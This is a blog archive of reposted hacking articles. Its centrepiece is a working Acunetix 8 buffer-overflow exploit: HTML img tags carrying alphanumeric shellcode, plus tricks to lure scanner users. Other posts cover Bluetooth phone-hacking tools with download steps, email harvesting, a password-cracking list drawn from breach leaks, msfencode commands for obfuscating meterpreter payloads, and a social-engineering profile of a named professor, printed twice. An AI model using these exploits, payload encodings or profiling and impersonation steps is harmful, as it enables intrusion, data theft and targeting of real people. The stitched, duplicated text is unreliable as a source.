Category Archives: Penetration Testing

Pwn the n00bs – Acunetix 0day

A few weeks ago I have published an article about WINRAR 0DAY.

That article revealed a new vulnerability that gave attackers, the ability to perform spoofing attack.

Many people wrote to me about the problems of that kind of article (for example).

So this time I’m goanna reveal a new 0DAY that will help security managers to protect their web sites against many vulnerability scans.

A lot of sites owners will tell you that the majority numbers of scans, performed against their sites, are performed by automatic tools like NESSUS, ACUNETIX, and APPSCAN.

Today 0DAY will be focused on one of the most popular web scan in the world, ACUNETIX.

The POC will be against ACUNETIX 8 (build 20120704 since it’s one of the most common cracked version which was published in the net and used by many newbie hackers).

This disclosure will not only reveal a new vulnerability, but demonstrates a whole new perception of dealing with external attacks.

Instead of protecting your web sites again and again, or buying a new advanced WAF (web application firewall), let’s give the attackers a reason to be afraid, reason to think twice before they press the “SCAN” button.

In this article, I will not give a full working exploit for all scan scenarios nor for all operating systems, but a proof of concept that hopefully will grow into a new effort of research for vulnerabilities in Penetration test tools.

So let’s get our hands dirty

 

ACUNETIX is a powerful tool for scanning and finding vulnerabilities at websites.

Many newbie attackers tend to use this tool due to the simplicity of its use.

ACUNETIX offers its users a simple wizard base scan that covers many aspects of the vulnerability scan.

One of the aspects is the ability to scan more domains or sub domains related to the scanned website.
For example, if we scan my blog “http://an7isec.blogspot.co.il”, we will get the result shown below:
After a little research about this option, I figured out that ACUNETIX starts its wizard by sending an HTTP request to the site and learning about it from its HTTP response.

Furthermore the wizard learns about the external related domains from the external sources that appear at the website, for example:

“<img src=http://externalSource.com/someimg.png >”

“<a href=http://externalSource.com/ ></a>”

Etc…

Further Analysis reveals that if one of the external domain name length is more than 268 Byte’s, ACUNETIX will be crashed , so if we want to cause a crash, all we need to do is to put some kind of external source at our site, which have the length of 268 Byte’s or more, say something like this:
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA”>

 

Quick view of this application in Immunity Debugger reveals that EDX was corrupted by the fuzzing string which caused access violation:

Despite the fact that further writing runs over the Structured Exaction Handler (SEH) as you will probably notice ,my advice for you is not to go that way, believe me I tried it for several days with no success (because of the safe SHE mechanism).

However, we have another problem with this exploit, In one word, “ASCII”.

ACUNETIX gets its information about external domains as a URL.

This fact causing the string to be converted into Web Browser friendly string.

While ASCII accepts chars like:

0x22 (“), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) and more …

URL string accepts only printable alphanumeric chars and URL converted special chars (with few exceptions).

So if my external source contains one of the special chars, they will be converted into

”%SOMETHING”.

For example, the char “quotes” (“) will be converted into 253232 in the memory because it’s the translation of %22.

Another example that demonstrates the URL encoding is: the char “percent” (%) which will be converted into 253235 in the memory.

Bypassing it, will be by building an exploit that contains only “A-Z, a-z, 1-0” chars and few special chars that aren’t converted in the process of URL ENCODE like:

“! ( ) = } { ” .

(not a simple job at all)

In short, I had to find a way to fix the flow of the application in order to avoid SEH based exploit (Because it was impossible to bypass safe SHE protection with URL ASCII strings only).

Finally, I found a way.
In order to fix the flow, EDX had to be overwritten with a readable memory address.

Nevertheless, it is important to remember that EDX is not been used as is, but minus 8:

MOVE ECX, DWORD PTR DS: [EDX-8];

Meaning that it doesn’t matter which memory address we use, we should add 8 to the address (in the exploit), convert the whole address into printable URL STRING, and hope to the best.

After little research, I found such an address.

The address was at “0x663030XX” and luckily it had the possibility to be converted into URL String without special bad char’s –> ” f005 “.

After playing with the code I found that the exact location of that EDX overwrite, is at 268 Byte’s offset.

So for now our exploit looks like this:

<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>

Running ACUNETIX’s scan against that payload, caused the next result:

 

 

As you can see above, the EIP was overwritten!!

It appears that the idea of fixing the flow was successful since it enabled me to be in a better position of attack (EIP overwrite).

Beside it, our potential space for shell code is now presented in EAX and ESP.

When it comes to the decision whether choosing ESP or EAX, ESP is a better choice from two different aspects:

One, ESP is pointing directly at the beginning of the shell string.

Two, there is much more space for a biggest shell code to be written.

After I chose ESP, I needed to find an instruction of “JMP ESP” in a memory address that could be written by URL string (limited ASCII as mention above).

The desired address successfully founded at the location of: 0x7e79515d (SXS.DLL) –

(In ASCII “ ]Qy~ “).

After all that, our shell code supposed to look like this:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>

  • 500f = 0x66303035 : readable memory location for fixing the flow of the application that was corrupted by the buffer overflow.
  • ]Qy~ = 0x7e79515d (JMP ESP from SXS.DLL).

 

OK, right now we are at the semifinal stage, running the application against above payload, produced the next result:

 

Yea… we landed exactly at the beginning of the final payload.

The next step will be to use suitable windows shell that will be made only from URL string (limited ASCII).

Such shell can be generated with “ Metasploit ” and it is called “Alphanumeric Shell”.

The important thing to remember while using such payload, is that the payload’s start address must be presented at one of the registers. If the payload presents at ESP, the first OP CODE of the shell need to be “PUSH ESP”.

In my Proof of concept, I used simple “CALC.EXE” shell code generated by “Metasploit that led me to the final stage which is ;working exploit!!

Moreover, our exploit is successfully bypassing DEP protection, simply by choosing only the addresses that aren’t compiled with DEP.

And due to the fact that ACUNETIX itself is not complied with DEP, this exploit should work perfectly on windows XP.

 

After successfully reaching all our goals, Let’s look on the final working exploit:

<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
We need to remember that in order to enjoy our exploit, the newbie hacker must check our extra domain name, in the list of the extra domains in ACUNETIX wizard window.

So what can we do in order to make our domain name attractive?

Thinking about it, I came up with two ideas:

1: writing some attempting domain name that will make the hackers check that domain, like, ADMIN.ControlMangment.1249874350345.An7isec.blogspot.co.il .

2: using several external domains with the following names:

“SQLINJECTION”

“XSS”

“CSRF”

And so on…

These kind of names will probably give the eye of the hacker the feeling that the domain list window is actually an options window.

The written code bellow demonstrates that kind of misleading:

<html> <img src=”http://SQLInjection…………………………………. …………………………………………………………… …………………………………………………………… …………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
<img src=”http://XSS…………………………………………. …………………………………………………………… …………………………………………………………… …”>
<img src=”http://CSRF………………………………………… …………………………………………………………… …………………………………………………………… ….”>
<img src=”http://DeepScan…………………………………….. …………………………………………………………… …………………………………………………………… ……..”>
<img src=”http://NetworkScan………………………………….. …………………………………………………………… …………………………………………………………… ………..”>
<img src=”http://DenialOfService………………………………. …………………………………………………………… …………………………………………………………… ……………”>
</html>

In conclusion,

Following all the above, we created a powerful exploit that Newbie hackers

will definitely fall for.

This exploit will give us the ability to do everything with all that nasty Newbie hackers that scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on…

Furthermore it can be used in order to collect smart intelligence about hostile forces who want to attack our web application.

BUT!!

The more powerful idea that motivated me to reveal this concept and POC, is the fact that this exploit is Anonymity killer! , because even if the attacker uses the most smart and secure proxy in the world, such as “TOR” and others, his ass will be revealed and full control on his scanning machine will be gained.
The exploit can be download from here.

Source: an7isec.blogspot

 

Advertisements

How to find a bug in application for penetration ?

A very good and important point. Right? If you are a software tester or a QA engineer then you must be thinking every minute to find a bug in an application. And you should be!

I think finding a blocker bug like any system crash is often rewarding! No I don’t think like that. You should try to find out the bugs that are most difficult to find and those always misleads users.

Finding such a subtle bugs is most challenging work and it gives you satisfaction of your work. Also it should be rewarded by seniors. I will share my experience of one such subtle bug that was not only difficult to catch but was difficult to reproduce also.
I was testing one module from my search engine project. I do most of the activities of this project manually as it is a bit complex to automate. That module consist of traffic and revenue stats of different affiliates and advertisers. So testing such a reports is always a difficult task. When I tested this report it was showing the data accurately processed for some time but when tried to test again after some time it was showing misleading results. It was strange and confusing to see the results.

There was a cron (cron is a automated script that runs after specified time or condition) to process the log files and update the database. Such multiple crons are running on log files and DB to synchronize the total data. There were two crons running on one table with some time intervals. There was a column in table that was getting overwritten by other cron making some data inconsistency. It took us long time to figure out the problem due to the vast DB processes and different crons.

My point is try to find out the hidden bugs in the system that might occur for special conditions and causes strong impact on the system. You can find such a bugs with some tips and tricks.

So what are those tips:

1) Understand the whole application or module in depth before starting the testing.

2) Prepare good test cases before start to testing. I mean give stress on the functional test cases which includes major risk of the application.

3) Create a sufficient test data before tests, this data set include the test case conditions and also the database records if you are going to test DB related application.

4) Perform repeated tests with different test environment.

5) Try to find out the result pattern and then compare your results with those patterns.

6) When you think that you have completed most of the test conditions and when you think you are tired somewhat then do some monkey testing.

————

7) Use your previous test data pattern to analyse the current set of tests.

8) Try some standard test cases for which you found the bugs in some different application. Like if you are testing input text box try inserting some html tags as the inputs and see the output on display page.

9) Last and the best trick is try very hard to find the bug .As if you are testing only to break the application!

Source:http://www.softwaretestinghelp.com/

Hack Mobile Phones With Bluetooth

You must have seen in movies that a HACKER accessing mobile phones to steal their important data. Bluetooth hacking is the most popular way to hack or to steal data from any phone.

There are lot of tools and softwares available on internet that can be used to hack any phone.
One of the most popular ways to transfer data between two mobile devices, in range, is via Bluetooth. But Bluetooth just like any other wireless network is prone to attackers. Bluetooth hacking could be classified into the following ways.
  • BlueJacking
  • BlueSnarfing
  • BlueBugging

In this post I have outlined only some Bluetooth hacking software.

1. Bluescanner :

The first thing one would need in bluetooth hacking, is to identify all the devices ahve their blutooth turned on. Bluescanner is a tool for windows OS , which help in discovering the Bluetooth devices as well as tries to get all the information for a newly discovered device.

2. Super Bluetooth Hack

This is one of the best tool used in hacking and is used to read information and controlling any phone with remote cell phone via Bluetooth.The Phone call list and SMS can be stored in the HTML type. In addition, it can also show the information about the battery, Sim network and many more.
If you want to download the software (Super Bluetooth Hack) simply download it and use it. It is quite easy to use. Follow these steps to install SBH(Super Bluetooth hack) directly to your phone :
1.Go to m.brothersoft.com.
2.Find Quick Download Page link at the bottom of the page.
3.Enter this Code: 127249
4. And your download will start Automatically.

3. BTbrowser

It is a J2ME mobile application which offers the same functionality similar to that BlueScanner.With this tool you can the browse and explore files. This application works on phones , which support JSR-82 such as Nokia 6600 and Sony Ericssion P900.  Download

4. BTCrawler

The BT Crawler is a device scanner for window Based mobiles. It can also perform other bluetooth hacking techniques, namely Bluesnarfing and bluejacking, to vulnerable bluetooth devices in range.
Download BTCrawler  Download.

Collect Email Addresses from Websites using Harvester

The information gathering steps of  footprinting  and scanning are the most importance before hacking. Good information gathering can make the difference between a successful penetration test and one that has failed to provide maximum benefit to the client.

We can say that Information is a weapon, a successful penetration testing and a hacking process need a lots of relevant information that is why, information gathering so called foot printing is the first step of hacking. So, gathering valid login names and emails are one of the most important parts for penetration testing.

TheHarvester has been developed in Python by Christian Martorella. It is a tool which provides us information of about e-mail accounts, user names and hostnames/subdomains from different public sources like search engines and PGP key server.

This tool is designed to help the penetration tester on an earlier stage; it is an effective, simple and easy to use. The sources supported are:

Google – emails, subdomains/hostnames

Google profiles – Employee names

Bing search – emails, subdomains/hostnames, virtual hosts

Pgp servers – emails, subdomains/hostnames

LinkedIn – Employee names

Exalead – emails, subdomain/hostnames

New features:

Time delays between requests

XML results export

Search a domain in all sources

Virtual host verifier

Getting Started:

If you are using kali linux, go the terminal and use the command theharvester.

In case, if it is not available in your distribution, than you can easily download it fromhttp://code.google.com/p/theharvester/downlaod, simply download it and extract it.

Provide execute permission to the theHarvester.py by [chmod 755 theHavester.py]

After getting in to that, simply run. /theharvester, it will display version and other option that can be used with this tool with detailed description.

#theHarvester -d [url] -l 300 -b [search engine name]

#theHarvester -d sixthstartech.com -l 300 -b google

-d [url] will be the remote site from which you wants to fetch the juicy information.

-l will limit the search for specified number.

-b is used to specify search engine name.

From above information of email address we can identify pattern of the email addresses assigned to the employees of the organization.

#theHarvester -d sixthstartech.com -l 300 -b all

Screenshot - Monday 11 August 2014 - 04:18:54 IST

This command will grab the information from multiple search engines supported by the specific version of theHarvester.

Save the result in HTML file. Command: 

#theHarvester.py -d sixthstartech.com  -l 300 -b all -f pentest

To save results in html file -f parameter is used as shown in this example.

Screenshot - Monday 11 August 2014 - 04:26:03 IST

CRACKSTATION:Best password cracking dictionary

What’s in the list?

The list contains every wordlist, dictionary, and password database leak that the creator could find on the internet (and he spent a LOT of time looking). It also contains every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages) as well as lots of books from Project Gutenberg. It also includes the passwords from some low-profile database breaches that were being sold in the underground years ago.

The format of the list is a standard text file sorted in non-case-sensitive alphabetical order. Lines are separated with a newline “\n” character.

You can test the list without downloading it by giving SHA256 hashes to the free hash cracker or to @PlzCrack on twitter. Here’s a tool for computing hashes easily. Here are the results of cracking LinkedIn’s and eHarmony’s password hash leaks with the list.

The list is responsible for cracking about 30% of all hashes given to CrackStation’s free hash cracker, but that figure should be taken with a grain of salt because some people try hashes of really weak passwords just to test the service, and others try to crack their hashes with other online hash crackers before finding CrackStation. Using the list, we were able to crack 49.98% of one customer’s set of 373,000 human password hashes to motivate their move to a better salting scheme.

Download:https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

Source:http://forum.top-hat-sec.com/index.php?topic=2371.0

Building Profiles for a Social Engineering Attack

The key to a successful social engineering engagement is trust.If you are able to win the trust of someone else easily then you can obtain any information you want.Also people are suspicious when they don’t know someone and they are not so open when you are going to ask for something about them or their company.However if you have done your research and you are giving them information that have valid grounds then you might be able to convince them and win their trust faster.In this article we will see how we can create a profile for someone who we don’t know.

Let’s say that our client is the MIT(Massachusetts Institute of Technology) and we don’t have any information about them.As a first step is to discover email addresses and profiles that exist on social media networks.We have two options in this step.We can use either the tool theHarvester or we can use the metasploit module calledsearch_email_collector.

The use of the email collector module of the metasploit framework is pretty simple.We just need to set the domain of our target and it will automatically search through Bing,Yahoo and Google for valid email addresses.

 

Our target in this case is the MIT so the domain that we want to set is the mit.edu.Below is a sample of our results.

 

From the other hand the tool theHarvester is providing us with more options.So except of the fact that we can scan for email addresses,we can scan also for profiles in social media like Google+ and Linkedin.In the next image you can see the command that we have executed in the tool.

 

Below is a sample of the email addresses that the tool theHarvester has discovered.Of course we can combine the results with the module of the metasploit if we wish.

 

We can try also to scan for profiles related to the mit.edu into professional social networks like Linkedin.We have discovered 2 profiles.

 

So we have a lot of email addresses and two names.Comparing the results with the metasploit module email collector we have identify that there is an email address that is probably corresponds to the Walter Lewin profile.The email address is lewin@mit.eduand you can see it in the results below.

 

Now that we have a name and an email address it is much more easier to search the web in order to collect as much information as possible about this particular person.For example we can start by checking his Linkedin profile.

 

We can use the email address lewin@mit.edu to discover his Facebook profile.

 

The information that we can retrieve without being friends on Facebook with is limited.However if we impersonate ourselves as a teacher of MIT we can send a friend request and we might be able to convince him with this way to add us to his friend list so we can have access to much more personal information.Another good tool for obtaining information is through the website pipl.com.

 

As you can see we have discovered information about the age,the job,the personal web space,his Amazon wish list and a website that contains the profile about this professor.Also from the same search we have manage to find his work phone number and his office room.

 

We can verify the above details by simply discovering his personal web page of the MIT.

 

From the above image except of the phone numbers and the addresses we have discovered also and the assistant of this professor.This can help us in many ways like:we are sending him an email pretending that it comes from his assistant.The professor will think that it came from a person that he trusts so he will respond to our questions more easily.

Basically the idea when constructing a profile of the person that you will use your social engineering skills is to have as much information as possible about his interests and activities,his friends and colleagues,emails and phone numbers etc.Keeping all that information on your notebook will help you to construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer guy.Every information that you will post on the Internet eventually it will stay forever.So before you post something personal think twice if it is really necessary to allow other people to know about my self and my activities.Also using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab appreciates highly the professor Mr. Walter Lewin and respects his work and contribution to the science and doesn’t encourage in any way his readers to use this personal information in order to perform illegal activities against this person.

SOURCE:

The key to a successful social engineering engagement is trust.If you are able to win the trust of someone else easily then you can obtain any information you want.Also people are suspicious when they don’t know someone and they are not so open when you are going to ask for something about them or their company.However if you have done your research and you are giving them information that have valid grounds then you might be able to convince them and win their trust faster.In this article we will see how we can create a profile for someone who we don’t know.

Let’s say that our client is the MIT(Massachusetts Institute of Technology) and we don’t have any information about them.As a first step is to discover email addresses and profiles that exist on social media networks.We have two options in this step.We can use either the tool theHarvester or we can use the metasploit module calledsearch_email_collector.

The use of the email collector module of the metasploit framework is pretty simple.We just need to set the domain of our target and it will automatically search through Bing,Yahoo and Google for valid email addresses.

 

Our target in this case is the MIT so the domain that we want to set is the mit.edu.Below is a sample of our results.

 

From the other hand the tool theHarvester is providing us with more options.So except of the fact that we can scan for email addresses,we can scan also for profiles in social media like Google+ and Linkedin.In the next image you can see the command that we have executed in the tool.

 

Below is a sample of the email addresses that the tool theHarvester has discovered.Of course we can combine the results with the module of the metasploit if we wish.

 

We can try also to scan for profiles related to the mit.edu into professional social networks like Linkedin.We have discovered 2 profiles.

 

So we have a lot of email addresses and two names.Comparing the results with the metasploit module email collector we have identify that there is an email address that is probably corresponds to the Walter Lewin profile.The email address is lewin@mit.eduand you can see it in the results below.

 

Now that we have a name and an email address it is much more easier to search the web in order to collect as much information as possible about this particular person.For example we can start by checking his Linkedin profile.

 

We can use the email address lewin@mit.edu to discover his Facebook profile.

 

The information that we can retrieve without being friends on Facebook with is limited.However if we impersonate ourselves as a teacher of MIT we can send a friend request and we might be able to convince him with this way to add us to his friend list so we can have access to much more personal information.Another good tool for obtaining information is through the website pipl.com.

 

As you can see we have discovered information about the age,the job,the personal web space,his Amazon wish list and a website that contains the profile about this professor.Also from the same search we have manage to find his work phone number and his office room.

 

We can verify the above details by simply discovering his personal web page of the MIT.

 

From the above image except of the phone numbers and the addresses we have discovered also and the assistant of this professor.This can help us in many ways like:we are sending him an email pretending that it comes from his assistant.The professor will think that it came from a person that he trusts so he will respond to our questions more easily.

Basically the idea when constructing a profile of the person that you will use your social engineering skills is to have as much information as possible about his interests and activities,his friends and colleagues,emails and phone numbers etc.Keeping all that information on your notebook will help you to construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer guy.Every information that you will post on the Internet eventually it will stay forever.So before you post something personal think twice if it is really necessary to allow other people to know about my self and my activities.Also using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab appreciates highly the professor Mr. Walter Lewin and respects his work and contribution to the science and doesn’t encourage in any way his readers to use this personal information in order to perform illegal activities against this person.

MSFencode Commands

msfencode -h

Display the help file of msfencode

msfencode -l

Lists the available encoders

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)

Format to display the encoded buffer

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Uses the shikata_ga_nai encoder to encode the payload.raw 5 times and exports it to a file called encoded_payload.exe

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Creation of a multi-encoded payload

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode where ESI points to the shellcode;output in C-style notation

Reference:

From the book Metasploit – The Penetration Testers Guide